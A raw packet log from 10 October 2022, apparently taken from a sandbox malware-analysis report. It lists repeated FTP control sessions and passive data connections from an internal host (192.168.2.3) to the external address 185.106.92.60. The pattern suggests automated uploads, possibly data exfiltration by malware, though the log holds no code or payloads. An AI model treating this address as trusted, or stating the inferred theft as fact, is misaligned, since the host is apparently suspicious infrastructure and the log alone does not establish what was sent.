                                                                                                                                    Oct 10, 2022 06:03:10.755249977 CEST2149913185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.755341053 CEST4991321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.756551027 CEST4991321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.779664993 CEST2149913185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.779769897 CEST4991321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.780700922 CEST4991464634192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.806828022 CEST6463449914185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.806972027 CEST4991464634192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.807286024 CEST4991321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.832504988 CEST2149913185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.832573891 CEST4991321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.833079100 CEST4991464634192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.857239008 CEST6463449914185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.857429981 CEST6463449914185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.857510090 CEST4991464634192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.858346939 CEST2149913185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.858407021 CEST4991321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.858581066 CEST4991321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:10.881818056 CEST2149913185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.881867886 CEST2149913185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:10.881928921 CEST4991321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.016927004 CEST4991521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.039880991 CEST2149915185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.040045023 CEST4991521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.067480087 CEST2149915185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.067570925 CEST4991521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.067651987 CEST2149915185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.067678928 CEST2149915185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.067692995 CEST4991521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.067713022 CEST4991521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.067879915 CEST4991521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.092359066 CEST2149915185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.092749119 CEST4991521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.092749119 CEST4991521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.117309093 CEST2149915185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.117405891 CEST4991521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.117580891 CEST4991521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.143291950 CEST2149915185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.143481970 CEST4991521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.145221949 CEST4991521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.170382023 CEST2149915185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.170466900 CEST4991521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.170844078 CEST4991521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.194125891 CEST2149915185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.194237947 CEST4991521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.195378065 CEST4991521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.220761061 CEST2149915185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.221229076 CEST4991664635192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.221229076 CEST4991521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.244648933 CEST6463549916185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.244945049 CEST4991664635192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.245197058 CEST4991521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.270369053 CEST2149915185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.270534039 CEST4991521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.275320053 CEST4991664635192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.298141956 CEST6463549916185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.298499107 CEST6463549916185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.298576117 CEST4991664635192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.298958063 CEST2149915185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.299034119 CEST4991521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.299166918 CEST4991521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.321955919 CEST2149915185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.322004080 CEST2149915185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.322057962 CEST4991521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.445557117 CEST4991721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.470170021 CEST2149917185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.470334053 CEST4991721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.500184059 CEST2149917185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.500261068 CEST2149917185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.500294924 CEST4991721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.500361919 CEST4991721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.500524044 CEST2149917185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.500583887 CEST4991721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.500682116 CEST4991721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.527517080 CEST2149917185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.527633905 CEST4991721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.527832031 CEST4991721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.555452108 CEST2149917185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.555581093 CEST4991721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.557845116 CEST4991721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.587594986 CEST2149917185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.587713003 CEST4991721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.598437071 CEST4991721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.626976967 CEST2149917185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.627090931 CEST4991721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.627546072 CEST4991721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.655088902 CEST2149917185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.657565117 CEST4991721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.658727884 CEST4991721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.687678099 CEST2149917185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.691534996 CEST4991721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.692797899 CEST4991864636192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.721318960 CEST6463649918185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.721512079 CEST4991864636192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.722711086 CEST4991721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.749396086 CEST2149917185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.753642082 CEST4991721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.754049063 CEST4991864636192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.778533936 CEST6463649918185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.778589964 CEST6463649918185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.778760910 CEST4991864636192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.779541016 CEST2149917185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.782088041 CEST4991721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.782197952 CEST4991721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.808465004 CEST2149917185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.808876991 CEST2149917185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.809041977 CEST4991721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.954442024 CEST4991921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:11.977315903 CEST2149919185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:11.979094028 CEST4991921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.005099058 CEST2149919185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.005161047 CEST2149919185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.005198002 CEST2149919185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.005410910 CEST4991921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.005410910 CEST4991921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.005568981 CEST4991921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.028429031 CEST2149919185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.028594971 CEST4991921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.028892040 CEST4991921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.051625013 CEST2149919185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.055138111 CEST4991921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.055231094 CEST4991921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.078092098 CEST2149919185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.083638906 CEST4991921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.083718061 CEST4991921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.106887102 CEST2149919185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.109639883 CEST4991921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.110186100 CEST4991921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.132807016 CEST2149919185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.135631084 CEST4991921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.138104916 CEST4991921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.161637068 CEST2149919185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.161731005 CEST4991921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.162034988 CEST4992064637192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.187016010 CEST6463749920185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.187231064 CEST4992064637192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.187956095 CEST4991921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.211308956 CEST2149919185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.214076996 CEST4991921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.214646101 CEST4992064637192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.237508059 CEST6463749920185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.237560034 CEST6463749920185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.237864971 CEST4992064637192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.238184929 CEST2149919185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.243719101 CEST4991921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.246579885 CEST4991921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.269330978 CEST2149919185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.269393921 CEST2149919185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.269536972 CEST4991921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.387377024 CEST4992121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.412592888 CEST2149921185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.412852049 CEST4992121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.442379951 CEST2149921185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.442442894 CEST2149921185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.442478895 CEST2149921185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.442641020 CEST4992121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.456127882 CEST4992121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.482152939 CEST2149921185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.485940933 CEST4992121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.486068010 CEST4992121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.514909983 CEST2149921185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.516099930 CEST4992121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.516359091 CEST4992121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.542100906 CEST2149921185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.547092915 CEST4992121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.547245979 CEST4992121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.571882010 CEST2149921185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.575716019 CEST4992121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.577778101 CEST4992121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.603218079 CEST2149921185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.603447914 CEST4992121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.604971886 CEST4992121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.635162115 CEST2149921185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.635425091 CEST4992121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.635844946 CEST4992264639192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.659132004 CEST6463949922185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.659280062 CEST4992264639192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.659868002 CEST4992121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.686774015 CEST2149921185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.686945915 CEST4992121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.687594891 CEST4992264639192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.710644960 CEST6463949922185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.710669041 CEST6463949922185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.710737944 CEST4992264639192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.715548992 CEST2149921185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.715773106 CEST4992121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.715993881 CEST4992121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.740768909 CEST2149921185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.740814924 CEST2149921185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.741101980 CEST4992121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.859054089 CEST4992321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.883157015 CEST2149923185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.883354902 CEST4992321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.910134077 CEST2149923185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.910187960 CEST2149923185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.910219908 CEST2149923185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.910315037 CEST4992321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.910352945 CEST4992321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.911664009 CEST4992321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.937161922 CEST2149923185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.937350988 CEST4992321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.937458038 CEST4992321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.963339090 CEST2149923185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.963577032 CEST4992321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.963747978 CEST4992321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.989348888 CEST2149923185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:12.989721060 CEST4992321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:12.989794970 CEST4992321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.015182018 CEST2149923185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.015284061 CEST4992321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.018210888 CEST4992321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.042220116 CEST2149923185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.042387962 CEST4992321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.043302059 CEST4992321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.070323944 CEST2149923185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.070544958 CEST4992321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.070735931 CEST4992464640192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.093331099 CEST6464049924185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.093482971 CEST4992464640192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.093935013 CEST4992321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.121982098 CEST2149923185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.122318029 CEST4992321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.127315998 CEST4992464640192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.151429892 CEST6464049924185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.151472092 CEST6464049924185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.151648045 CEST4992464640192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.153770924 CEST2149923185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.154000998 CEST4992321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.154275894 CEST4992321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.178996086 CEST2149923185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.179032087 CEST2149923185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.179228067 CEST4992321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.290488958 CEST4992521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.317903996 CEST2149925185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.318424940 CEST4992521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.346189976 CEST2149925185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.346247911 CEST2149925185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.346286058 CEST2149925185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.346344948 CEST4992521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.346344948 CEST4992521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.346344948 CEST4992521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.346585035 CEST4992521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.371298075 CEST2149925185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.371546984 CEST4992521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.371748924 CEST4992521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.397743940 CEST2149925185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.398041010 CEST4992521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.398402929 CEST4992521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.423547983 CEST2149925185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.423808098 CEST4992521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.424212933 CEST4992521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.449412107 CEST2149925185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.449796915 CEST4992521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.450165987 CEST4992521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.476305008 CEST2149925185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.476481915 CEST4992521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.477332115 CEST4992521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.501200914 CEST2149925185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.501455069 CEST4992521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.501935959 CEST4992664641192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.527163029 CEST6464149926185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.527354002 CEST4992664641192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.527908087 CEST4992521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.555577040 CEST2149925185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.555704117 CEST4992521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.556343079 CEST4992664641192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.582304955 CEST6464149926185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.582521915 CEST6464149926185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.582607031 CEST4992664641192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.584939003 CEST2149925185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.585355043 CEST4992521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.585355043 CEST4992521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.610317945 CEST2149925185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.610363007 CEST2149925185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.610492945 CEST4992521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.725593090 CEST4992721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.748975992 CEST2149927185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.749233961 CEST4992721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.776479959 CEST2149927185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.776537895 CEST2149927185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.776678085 CEST4992721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.776678085 CEST4992721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.777118921 CEST2149927185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.777208090 CEST4992721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.777282000 CEST4992721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.800292015 CEST2149927185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.800379992 CEST4992721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.800585032 CEST4992721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.824275970 CEST2149927185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.824521065 CEST4992721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.824687004 CEST4992721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.848337889 CEST2149927185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.848573923 CEST4992721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.848683119 CEST4992721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.872221947 CEST2149927185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.872301102 CEST4992721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.879168987 CEST4992721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.902513981 CEST2149927185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.902678013 CEST4992721192.168.2.3185.106.92.60
